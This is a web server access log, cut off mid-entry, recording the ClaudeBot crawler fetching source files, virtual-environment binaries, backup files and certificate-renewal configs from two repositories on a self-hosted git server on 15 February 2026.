-[15/Feb/2026:15:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/css/style.css?display=rendered" [Client 216.73.216.188] [Length 10923] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js" [Client 216.73.216.188] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py?display=rendered" [Client 216.73.216.188] [Length 10973] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:27:27 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/%7Bitem.href%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py?display=source" [Client 216.73.216.188] [Length 16655] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 4934] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py?display=source" [Client 216.73.216.188] [Length 13095] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 1922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py?display=rendered" [Client 216.73.216.188] [Length 10969] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py?display=rendered" [Client 216.73.216.188] [Length 10970] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fassets%2Fcss%2Fstyle.css" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude" [Client 216.73.216.188] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 12993] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude" [Client 216.73.216.188] [Length 5547] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 11547] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude?display=source" [Client 216.73.216.188] [Length 15322] [Gzip 4.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:29:37 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/%7Bservice.image%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt" [Client 216.73.216.188] [Length 9865] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 11063] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 11066] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 11055] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 11553] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 19881] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html?display=source" [Client 216.73.216.188] [Length 14410] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json?display=source" [Client 216.73.216.188] [Length 11063] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 11543] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 12152] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 11535] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude?display=rendered" [Client 216.73.216.188] [Length 10977] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 13516] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 11531] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" [Client 216.73.216.188] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 11555] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore?display=source" [Client 216.73.216.188] [Length 11475] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:08 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/%7Bservice.image%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 11536] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3?follow_symlink=1" [Client 216.73.216.188] [Length 11088] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python?follow_symlink=1" [Client 216.73.216.188] [Length 11077] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py?display=source" [Client 216.73.216.188] [Length 13021] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:09 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/%7Bitem.href%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" [Client 216.73.216.188] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal" [Client 216.73.216.188] [Length 9933] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" [Client 216.73.216.188] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12?follow_symlink=1" [Client 216.73.216.188] [Length 11085] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" [Client 216.73.216.188] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets" [Client 216.73.216.188] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm" [Client 216.73.216.188] [Length 64178] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json" [Client 216.73.216.188] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fassets%2Fjs" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fupdate_status.py" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:09 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/%7Bitem.href%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json?display=rendered" [Client 216.73.216.188] [Length 10893] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Findex.html" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore" [Client 216.73.216.188] [Length 9854] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore" [Client 216.73.216.188] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" [Client 216.73.216.188] [Length 11703] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fstatus.json" [Client 216.73.216.188] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" [Client 216.73.216.188] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:20 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/%7Bservice.image%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg?display=source" [Client 216.73.216.188] [Length 11246] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf" [Client 216.73.216.188] [Length 11705] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf" [Client 216.73.216.188] [Length 11711] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 